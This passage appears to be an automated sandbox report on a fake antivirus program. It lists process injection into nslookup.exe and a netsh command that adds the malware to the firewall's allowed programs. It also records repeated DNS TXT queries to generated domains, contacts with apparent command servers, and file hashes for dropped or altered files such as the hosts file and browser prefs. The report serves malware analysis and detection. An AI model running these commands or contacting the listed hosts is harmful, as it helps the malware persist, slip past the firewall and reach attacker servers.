PID 64 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe
PID 64 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe C:\Windows\SysWOW64\nslookup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp "C:\Users\Admin\AppData\Local\Temp\Fake AV\5781.mof"

C:\Windows\SysWOW64\netsh.exe

netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe" "Internet Security Guard" ENABLE

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.220.220

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 74.82.198.254:80 tcp
US 8.8.8.8:53 www5.internet-security-guard.com udp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 122.131.105.46.in-addr.arpa udp
US 74.82.198.254:80 tcp
SG 76.73.19.181:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 222.222.67.208.in-addr.arpa udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 220.220.67.208.in-addr.arpa udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 74.82.198.253:80 tcp
US 74.82.198.253:80 tcp
SG 76.73.19.181:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 74.82.198.254:80 tcp
US 74.82.198.253:80 tcp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
N/A 127.0.0.1:27777 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 74.82.198.254:80 tcp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 74.82.198.253:80 tcp

Files

memory/64-0-0x00000000023F0000-0x00000000023F1000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 b8224e5293d4fad1927c751cc00c80e7
SHA1 270b8c752c7e93ec5485361fe6ef7b37f0b4513b
SHA256 c47da9be4fc4d757add73c49654c9179067af547d0cc758d6356e2955bbfcb61
SHA512 8fed9a509e46319529145fa2159251e43040d26080af84e44badaab1dd339c767ff75a2c473bc0abfb448b03beb96718ee34ba6bc150ed3085322878b55a22f2

C:\Windows\System32\drivers\etc\hosts

MD5 008fba141529811128b8cd5f52300f6e
SHA1 1a350b35d82cb4bd7a924b6840c36a678105f793
SHA256 ab0e454a786ef19a3ae1337f10f47354ffa9521ea5026e9e11174eca22d86e84
SHA512 80189560b6cf180a9c1ecafc90018b48541687f52f5d49b54ca25e040b3264da053e3d4dbb0cd38caaf496e23e516de18f500b333e3cda1fd1b25c6e9632defc

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 6e86650ad96258b23f022605c5f202d5
SHA1 321290e91871cb653441e3c87ee8b20ab5f008a0
SHA256 8c39246796530ee7588fc16486335d00d5b7273ebb26efe5833e4cfc2bcfe223
SHA512 e8a7bdf4bd2fba233a1a6cdf977d57dcb37ae46bc52bf29b4d23c6294e769069e146bcb5f56c4edbc3f93d38a226a9349f604b54156696ccdef41106cc05060c

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c0d1c60ba61e5779908fca77da375398
SHA1 7b4029b08abeef0c7debd2f9ea44c3ac0d55a926
SHA256 275727d35e9f113539cf02fb81ef35408242c29c14755f592d54590d23bbfedd
SHA512 7306029e6ef8082e6f23ed8e9ae8893249290b8f579942dd4e857bc98b6d54f895a4a63992689d8a7f4a2b93c90b178d3b53d323da25cff5fecbcbe8503bc488

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0etkwu5l.default-release\prefs.js

MD5 bf8ebb7e5ad797e5ab158a0d8a5ab5da
SHA1 9ad01fa0a0074b775d77171b18ee22c264b8fa54
SHA256 498d565388665d46c31f7eaf04cda36242733a7848e967a027c83a7412b61c5c
SHA512 36337d24bc7a06508c719d3104b84510d649fa37ec4d2edaac12bda8a8ed2bc370f2923bffc185932af2868e189fde160fb1e95dfc9e1e88c06c8ea2bbd13dcd

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c9ce59b1e3ee8b75017e9a71f4df4fde
SHA1 5e0cfc36216696b394c10d043d914b95b0ac9506
SHA256 a73cb08ae5a7408d0fd322cb3ba096276a3c2db4f35fba5796692fc62cbe413c
SHA512 2b2463c9685172837b5e1d55f3d85c42b153e2db3b9c020f19b104d34540a96162e645809e68cb082e3047df7a2299acedd37572a40f6c13fbe2ffc66f83987b

C:\Users\Admin\AppData\Roaming\Internet Security Guard\cookies.sqlite

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 614640314f320e667f14c1899746a503
SHA1 df2fd4a0379368f4456c8c7e910affd667d01b84
SHA256 a1e76dbb882c6f57c5ab01a5335b38a2de49e1e7a396ec74f10ca1ef52b6ce6d
SHA512 11f8877faaae439d6c8bd3520644dd5c11104b6b4c42c506e0ff11f63d63a1acd933f09cf6ec4c85b0586ebbc63288cc4aa8690f6150d4c01e69bbbe75f98820

C:\ProgramData\8b93e\IS978.exe

MD5 fe7c10448a5cc17a65029be6a71bd190
SHA1 e1767d3163388f2d74f89475f237f55154c22135
SHA256 aa350ca50c1656d06182bb60a2bad3f749225ba6ccbd841680c211bd756eefad
SHA512 313ae00c9504e395836e38e15bc3d3b9bcd408faf936fc1a9fde641aac302f49b0d8dc5d1e3546a7e35fe3ddabfbe193314fbaed9f96f268e5fcd4b696099e0e

C:\Users\Admin\AppData\Local\Temp\Fake AV\5781.mof

MD5 3754f8f8abad5bad797085d0717a9766
SHA1 48d92f36cb721b390e216aa03b27b41f25c563fc
SHA256 3c77f5f888d417a7a31284cb8c5e3bdb4d926c4a274cecac8a8b2920659d5927
SHA512 c59f322ece53c757767e52fe9bfbc3526a13afe9ec7503e3d1cae683eeb55cbb808a1bce720fd58f97f286756d314124bcf797c2167275e08ed93ba759bf3985

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 3478a0b0d29081b3dd28481a9437226a
SHA1 22f00dc21f300026431d716e3cc96ff7b1fd2c33
SHA256 b9d10d67574441c9fe5804b0c48c8b4b3829f3ddf9c6913febaf4d177211eb08
SHA512 33b6b700ddcad993dc79f4f9ace5a31556c7dc5cda43dc283331b2b2fcb4da6ede3a8874f77e6e64e48d828996137773f0b7c9ef025f3af247a76771376b1feb

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 98c56cc5a5ad2768f9c2de15ae05bce0
SHA1 ba6024976a446be70e500bc4318df2ba57b40624
SHA256 7f10dcf6013b5696925c9d613893b7c7e8023be95a35d4edd563594a556c142e
SHA512 6c4942eec234ad7276dacecf019da20df83f8ac535cc1e2b656e01468c06434cc69504c0fbb16d7dc0757d65fb076c7cf9d1586808b9bede9af8bd0b9203a3e2

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c27a57f000ebaa707932db0f7821c77f
SHA1 2f94ae38c56aaa32b5566bf7073ce0b1b3eb159e
SHA256 cb96d05337897d60ca9628c1f6f69e67e2b784818ff1dec24f229aca1b03d466
SHA512 b39b3c4f3e5dabf5440adb0eae1335f4f070c61d827695bb6d7edfbd817a9bcbc28f3fb6b96ed3f178c5111f8e0bb6f7f837feea56c2021cbb2e7319f2ff6b9c

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 24e7829c023f5ee044e40ad9e2cf5f1a
SHA1 b7cc75068765a450f112230f08b577bb25630da6
SHA256 54ef66c9894b0423e30105628a767e6b422fb0c02be614e0cbc3a2ec1851654a
SHA512 a6f7f02a522035039c3107e1ef2c79687106a92d14339f595e3fdba7da6fde960ec948e495d35154c7a07850acaa1c951fc0bf640860f8e1a8bc34af57840aed

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 d06c0de9604e2e2c45c42a82a2b8e333
SHA1 c2893e549458c48b0a5b4ebe07ae794b725d23dd
SHA256 e841a98e62047dd9d21be1d6afd524eb662f627f692df28ea14d24275ab9def2
SHA512 c2bd03533d618e91da41959858997d5627c5bd9ea65113de178552b5a3fd1a3e7963ea3bf141b4c2fa615a2a0df3bfa0d57c186aabce36a5b57afc507720a70f

memory/64-423-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 07d20e95c2a5ea8b2dd526dc80584a10
SHA1 cb3b943b0600fc4cbce9fc13874946f46eb933e7
SHA256 e7bbf018c2877d81007346c0796d10db12cabdf3aba7be4656cd8cff9088d208
SHA512 26a5c9fdb296d54c025a82689fa7a240c4928d7bcd259933f7294e6c499dc3bdf2ac3f3a30815c55910031cebb9776ab36df31f48bb45c6d26b4057f3dc262ff

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 06363b1a2562d3102f04ef94b71416de
SHA1 9cfc40ac33dcad09bf3addd5ce7165ec24f7bd11
SHA256 30c5b9b48d4d3aac91cfe829c14514a8a9a0a3621802891373e011170fe3c7f4
SHA512 908dc915aa528761326397dee3fea768ea5c974d4716a95be0e0f928576596cd4cd47700cce5977eb63232fd8fe5c313acda08b88c8ba2d75eea90351fd9f7f5

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 d9dc368d346defd69187a472d34a4134
SHA1 f11aa565121623f552a211140ed663e85060f182
SHA256 bedfee0f41b9aa0c9b1767c0b6ae5b73a25775c6e4246b4f1dce712cc715e542
SHA512 0e95b7000876086005f8cd1ad43646e68d5372c467a6f427a6ee585f9584c3e3f701207e63dde04354cdd816abe6a6fedb1d0669f88fd29014ed8ad73db0f0f8

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 b466d4fd4a5fe76a26effe5004f0ef21
SHA1 4b0a2a478ffab1b2b4a0082fd9578bfba01f4c5c
SHA256 ab14a6ff8c11cecec6a84ca69f0c12a26224468a3e695573d8bb7952f56724e6
SHA512 10c85255a79d9490896bace5bc5c8425159ca273c481c9ecf11083670838f4cd2e2a8e68ec1f040848350c314fb68adffba33c9d03307152acba651ba139ce16

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 0d5c00ef7eae233c849b23bef8727676
SHA1 0424ba73bad0e3f291a90fec3bb86bc20a776a9f
SHA256 377008d751f87732ca02182456b5d767e1c2b391a426b53106d3dd028530ebec
SHA512 2f76da17e4357f3b5b5428de88e936e674a6c5d0a13e9e49fa7c4436ddef1f5c31ab31dd65fd33e63c22336c82f63af450ff6ab1a1f313af4a0a052325ee9c35

memory/64-484-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-485-0x00000000023F0000-0x00000000023F1000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 5ec1eb1ab2e0b62ad1cd97956bae8dce
SHA1 be9e327e45409ae795a69cc9e50a4c5bb4049814
SHA256 d4433e694eccb96fa4ce9dd82f00f4d29512c33ca7a6e06d55592d757a1a99ac
SHA512 cab651763361e49b5d03198bbeaee8df6ab5aa6dced4e9f43a65a5104fb9cf0b7d19b9cc4ff93c24b6fadc4ee27415cd32c1b8a5aa568cfdaa4bc478a5781340

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c7b227048219ac5811bc2f777e879a8d
SHA1 c264c74ff88210fb88ea8c5c947b96220f2e4a07
SHA256 4a9a735a12405b0fe4c1fbcb38d1f57808ac0386167d3024eaff850d0fe4ee83
SHA512 853f5bae6f7049a7802d23617a4b2c68d64dacdcd3ef4754ac8f06f52bf4046a0613450b2b2149d4d16d0515461511d87fbb2b6a301317cc1f304598959d3670

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 2df5ad84c45badf1e03bd68bf95eb86c
SHA1 1c6eef307c6aa4bdf578073ae71a77004f68d31b
SHA256 655196e91302a5d6deb266cede4a6b193f6175a79a9b463c0ce26bacbbe2b040
SHA512 e90f3223081876419f51efe4733d581bff73c36bc876c9e60cb259892c9a43e0eb226a0b5fd89b89dd22cf1eacd208ac2afe05b8bdf63a5dd91a84228ff88f5c

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 0d9645e24c9b3dcc429ece0db44e2136
SHA1 67b2dc6dbd4b452a32eb080db0f1d7da068422a5
SHA256 4b35e346498774a434fd8f0d7db0c23adcb33c582d39e3c97e76e6f93eb90d17
SHA512 c8710ed57982f47713a70e1743fd4ac4362d19a3392f0f5c8b0cae3673814f88f16d9493e3f16c6f45b4d027c9a6e9597480f18257bb2e07136d0596d1d8d69f

memory/64-535-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 63c3c1816d205ef6a895a020c603fb4f
SHA1 eb57e0176ac506bff77a9dddc4bf8aef7bc308d2
SHA256 91b0b9b7ec6bbed884331231a21581b7eb30aa4ebaebf70ec8e9a666dedc2557
SHA512 43eedaf7b0b7a12043650705b465ddf0d5c23604dcc084603ae1de3295fabdd8f9ef0d1bfa0b8dec75647de18aacd7a6f9c86934a12f04d98a89f8cd6bf133fc

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 61e9ea70910e91d7232e04fe83ba7a6d
SHA1 d21edcbaeee79549f05c3db4b33ed2414c000fba
SHA256 2f9346e228a51813dc895e2fcf679d9894c0739dfdb5e88fdc16c59c68fd5c26
SHA512 2dcb38005f3c6d204d85756f892f53aedcc90ad75ae3b49aa8fb5124cf3eb6389648a871e8ce838dc15b558e3c7ffa3fccd1231d6cbea7bfe6c659aa14b6892e

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 3129f839d59c5f3d3cd267817f27d292
SHA1 3101a3593fa865290ec4c1310ba37368e3ffc8c0
SHA256 c6004eb98e8c34e2fa1dc136ccfbf366c897f1226ccc0649e9b6be6f3741b525
SHA512 e10855220fde90204b3f93e274b9c75b70a26c8cca2ac04459babd7bca7de35369dc12328b7270038a8c6a7d279e24edc2528a655c25fbdeac6b8c633aa99b7f

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 aba755f7b4d32732e06ec35015f92024
SHA1 f3a016dcdfe7c59ddad18fa8223c854444094f55
SHA256 e3b99bb6692ffcb94545f34ff49b054deeb9f455f75e0694306699b1316d7afb
SHA512 a3e2a7913d69565cc7e31ba10c56cf996b6bbd439c0a449854d39990b5ae493bfbd3d2455155a8d16d466f01fee0b39818d160ffe8768278168e07e8f7ca1219

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 8643c4e4da3fc60067945b37eb42bc04
SHA1 1c6ce62ac6e39f88a08e07641b4a4e91eba54648
SHA256 3979a8da68d0a6ded406bfd28b4d674d5d1006485ffeb37069064e280f46b237
SHA512 479910d0dafa6a45735b24f61d9469bec108a4b90f29c7c63655b9d2633fa7a489123cc30520ec3b195f562bde9bd603651acd33ff9404a1220ecdf7edb7a0fc

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 538264467013e1dec74f79c771b02ad5
